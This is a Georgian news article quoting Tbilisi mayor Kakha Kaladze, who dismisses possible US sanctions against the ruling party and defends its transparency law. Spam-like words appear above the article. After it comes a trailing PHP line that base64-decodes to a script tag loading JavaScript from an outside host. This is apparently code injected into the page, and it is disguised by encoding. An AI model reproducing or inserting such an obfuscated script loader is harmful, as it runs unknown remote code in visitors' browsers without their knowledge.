celsiusi
ავერსი შნაიდერი

„მე არანაირი შეტყობინება არ მომსვლია. ამ საკითხზე არ ვნერვიულობ და ნურც თქვენ ინერვიულებთ“, - ამის შესახებ დედაქალაქის მერმა, კახა კალაძემ მედიასთან სანქციებთან დაკავშირებით დასმული შეკითხვის საპასუხოდ ისაუბრა.

როგორც მან აღნიშნა, როდესაც საქმე ეხება სამშობლოს, მისთვის სადმე წასვლა-არწასვლა პრობლემას არ წარმოადგენს.

„ვიღაცისთვის შეიძლება სადღაც წასვლა ან არწასვლა პრობლემას წარმოადგენს. ჩემთვის არსებითი მნიშვნელობა არ აქვს, როდესაც სამშობლოზეა საუბარი. მე არანაირი შეტყობინება არ მომსვლია. აშშ-ს ვიზა არ მაქვს. ბოლოს ამერიკაში ვიყავი, როდესაც საფეხბურთო კლუბ „მილანში“ ვთამაშობდი. მას შემდეგ, აშშ-ში არ ვყოფილვარ და არც მაქვს სურვილი წასვლის. მე არ ვნერვიულობ ამაზე. ღმერთს ვთხოვ, რომ ამაზე მეტი სანერვიულო არ მომცეს ცხოვრებაში და ნურც თქვენ ინერვიულებთ“, - აღნიშნა კახა კალაძემ.

დედაქალაქის მერმა კიდევ ერთხელ აღნიშნა, რომ წარმოუდგენელია, რატომ უნდა დასანქცირდეს ხელისუფლება, რომელიც ატარებს ქვეყნისა და მოქალაქეებს ინტერესებს, იცავს სუვერენიტეტს და ინარჩუნებს მშვიდობას.

„ჩვენ ერთხელ უკვე მოვისმინეთ განცხადება სანქციებთან დაკავშირებით. მე კიდევ ერთხელ ვიმეორებ - ეს არ ცვლის ჩვენს დამოკიდებულებას სამშობლოს მიმართ. ჩვენი გადაწყვეტილება არ იცვლება, როდესაც საუბარია ქვეყნის ინტერესებზე, მომავალზე და ხვალინდელ დღეზე. არავის ეშინია სანქციების. შესაბამისად, ჩვენ გაცხადებული გვაქვს ჩვენი პოლიტიკა - ვიცავთ ქვეყნის ინტერესებს, გვინდა სიმშვიდე შევინარჩუნოთ, ქვეყნის ეკონომიკური განვითარება-გაძლიერება მოვახდინოთ. ჩვენ ვატარებთ ამ ქვეყანაში მცხოვრებლების ინტერესებს, ვიცავთ სახელმწიფოებრიობას, სუვერენიტეტს, დამოუკიდებლობასა და თავისუფლებას.

ამასთანავე, მზად ვართ თანამშრომლობისა და მეგობრობისთვის, რომ სტრატეგიული პარტნიორული ურთიერთობის გადატვირთვა მოხდეს და იყოს ნამდვილი, ჯანსაღი ურთიერთობები, რაც ჩვენთვისაც მნიშვნელოვანია“, - განაცხადა თბილისის მერმა.

მისივე თქმით, რამდენი ადამიანიც არ უნდა დასანქცირდეს აშშ-ს მხრიდან, ამას არსებითი მნიშვნელობა არ აქვს და ხელისუფლება გააგრძელებს ქვეყნის სადარაჯოზე დგომას.

„ამიხსნან ერთი მიზეზი, რატომ შეიძლება მმართველი გუნდი იყოს სანქცირებული. რაში გამოიხატება ევროინტეგრაციისთვის ძირის გამოთხრა? ან რომელი ადამიანების უფლებები დაირღვა 2012 წლიდან დღემდე? უბრალოდ წარმოუდგენელი, არასერიოზული და ღიმილის მომგვრელია სანქციებზე საუბარი. შეიძლება 100, შეიძლება 200 ადამიანია სანქცირებული. არ ვიცი. ამას არსებითი მნიშვნელობა არ აქვს. ჩვენ ვდგავართ ქვეყნის სადარაჯოზე და ბოლომდე დავდგებით. უპირველესი ჩვენი ქვეყანაა. არავის მიეცემა იმის შესაძლებლობა, რომ საქართველოში მოხდეს ის, რაც სამწუხაროდ, უკრაინაში ხდება.

მე ადრეც ვთქვი, რომ დარწმუნებული ვიყავი სანქციები არ იქნება-თქო, რადგან ამის საბაბი არ არსებობს. დღესაც არ არსებობს ამის საბაბი, თუ რატომ უნდა დასანქცირდნენ „ქართული ოცნების“ წარმომადგენლები, მთავრობის წევრები. უფლებამოსილება, რაც მათ ხალხმა მიანიჭა, რომ მიიღონ კანონი გამჭვირვალობასთან დაკავშირებით, ამის გამო უნდა დასანქცირდნენ? ეს არის სწორი? ხომ შეიძლება ვინმემ ერთი არგუმენტი მოიყვანოს, რატომ არის კანონი ცუდი“, - აღნიშნა კახა კალაძემ.

188
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");